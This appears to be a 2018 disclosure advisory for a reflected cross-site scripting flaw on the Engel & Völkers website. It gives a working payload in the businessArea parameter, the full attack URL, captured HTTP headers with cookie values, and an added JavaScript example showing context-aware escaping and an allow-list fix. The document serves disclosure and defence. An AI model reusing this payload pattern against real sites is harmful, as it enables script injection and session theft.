Engel Voelkers Cross Site Scripting

www.engelvoelkers.com suffers from a cross site scripting vulnerability.


MD5 | c6735ebd3b2429471544656ab00806de

# Exploit Title: [ Reflected XSS at Engel Voelkers ]

# Date: [27.05.2018]

# Exploit Author: [Ismail Tasdelen]

# Vendor Homepage: [https://www.engelvoelkers.com/]

# Software Link: [ Engel Voelkers Website ]

# Version: 1.0

# Tested on: Kali Linux

# Reflected XSS Payload : residential'-confirm(/Ismail Tasdelen/)-'

# HTTP REQUEST HEADER :

Request URL: https://www.engelvoelkers.com/en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
Request Method: GET
Status Code: 200
Remote Address: 130.211.26.108:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.engelvoelkers.com
:method: GET
:path: /en/search/?businessArea=residential%27-confirm%28%2FIsmail%20Tasdelen%2F%29-%27&srch=search-text&q=&facets=cntry%3A%3B
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: nbu=4b33b1ea-61d0-11e8-96d5-42010a103302; signature=4da87ca2e51b5650fefa58627a5b8e70a10bf0425369cef6cb90534ea2c768be; verify=NGIzM2IxZWEtNjFkMC0xMWU4LTk2ZDUtNDIwMTBhMTAzMzAyOyUyZmVuJTJmc2VhcmNoJTJmJTNmYnVzaW5lc3NBcmVhJTNkcmVzaWRlbnRpYWwlMjUyNy1jb25maXJtJTI1MjglMjUyRklzbWFpbCUyNTIwVGFzZGVsZW4lMjUyRiUyNTI5LSUyNTI3JTI2c3JjaCUzZHNlYXJjaC10ZXh0JTI2cSUzZCUyNmZhY2V0cyUzZGNudHJ5JTI1M0ElMjUzQjtTdW4sIDI3IE1heSAyMDE4IDE3OjA2OjI3IEdNVA==; _ga=GA1.2.744261947.1527435138; _gid=GA1.2.959267156.1527435138; nbu=06e7d858-dec2-4d6f-ad04-b67e05551ffd; engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; _icl_current_language=en; evlocale=en_TR; BIGipServergroup-rz-webfe-prod=235738028.20480.0000; _gat_ev_com=1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36

# HTTP RESPONSE HEADER :

accept-ranges: bytes
age: 0
alt-svc: clear
cache-control: max-age=0, proxy-revalidate, no-cache, no-store, must-revalidate, private
content-encoding: gzip
content-language: en-TR
content-type: text/html;charset=utf-8
date: Sun, 27 May 2018 17:07:33 GMT
ev-revision: ce7e759467f9281d7107826ce514d214b3f4cb0a
ev-version: P-12.4.1-FRONTEND
expires: 0
expires: Tue, 01 Jan 1980 1:00:00 GMT
pragma: no-cache
server: Apache
set-cookie: engelundvoelkersconfig=TRY-sqm.m-false-TR-tr; Path=/
set-cookie: _icl_current_language=en; Path=/
set-cookie: evlocale=en_TR; Path=/
set-cookie: evlocale=en_TR; Path=/
status: 200
vary: X-MCS-LB-Info-S,Accept-Encoding
via: 1.1 google

# Query String Parameters :

businessArea: residential'-confirm(/Ismail Tasdelen/)-'
srch: search-text
q:
facets: cntry:;
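
The payload shape ('-confirm(...)-') only works when the value lands inside a single-quoted JavaScript string, so the fix is encoding for that context plus an allow-list. The following is an added example, not code from the advisory or from the vendor's site. It assumes businessArea is echoed into an inline <script> string literal (the advisory does not show the response body); all function names and the "commercial" allow-list entry are hypothetical.

```javascript
// Added example; assumes the parameter is reflected inside a single-quoted
// JavaScript string in an inline <script> block (not shown in the advisory).

// businessArea value from the advisory, URL-decoded.
const PAYLOAD = "residential'-confirm(/Ismail Tasdelen/)-'";

// Hypothetical vulnerable template: raw concatenation into a JS string literal.
function renderVulnerable(businessArea) {
  return "<script>var businessArea = '" + businessArea + "';</script>";
}

// Encode for a JS string literal embedded in HTML: every UTF-16 code unit
// outside a small safe set becomes \uXXXX, so quotes, slashes, parentheses
// and '<' (which could close the script element) lose their meaning.
function escapeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9 _.,]/g, (ch) =>
    "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0"));
}

function renderHardened(businessArea) {
  return "<script>var businessArea = '" +
    escapeForJsString(businessArea) + "';</script>";
}

// Defence in depth: the parameter is an enumeration, so reject anything
// that is not a known value. The set below is a constructed sample.
const ALLOWED_AREAS = new Set(["residential", "commercial"]);
function validateBusinessArea(value) {
  return ALLOWED_AREAS.has(value) ? value : null;
}

// Test helper: run the inline script body with a stubbed confirm() and
// report whether the reflected value stayed data or executed as code.
function runInlineScript(html) {
  const body = html.slice("<script>".length, -"</script>".length);
  let confirmCalls = 0;
  const fn = new Function("confirm", body + "\nreturn businessArea;");
  const value = fn(() => { confirmCalls += 1; return true; });
  return { confirmCalls, value };
}

const before = runInlineScript(renderVulnerable(PAYLOAD));
const after = runInlineScript(renderHardened(PAYLOAD));
console.log("vulnerable: confirm() calls =", before.confirmCalls);
console.log("hardened:   confirm() calls =", after.confirmCalls,
  "| value round-trips =", after.value === PAYLOAD);
console.log("allow-list accepts payload:", validateBusinessArea(PAYLOAD) !== null);
```

HTML entity encoding alone would not help in this context, because the browser does not decode entities inside a script element; the encoding has to match where the value is written.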

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
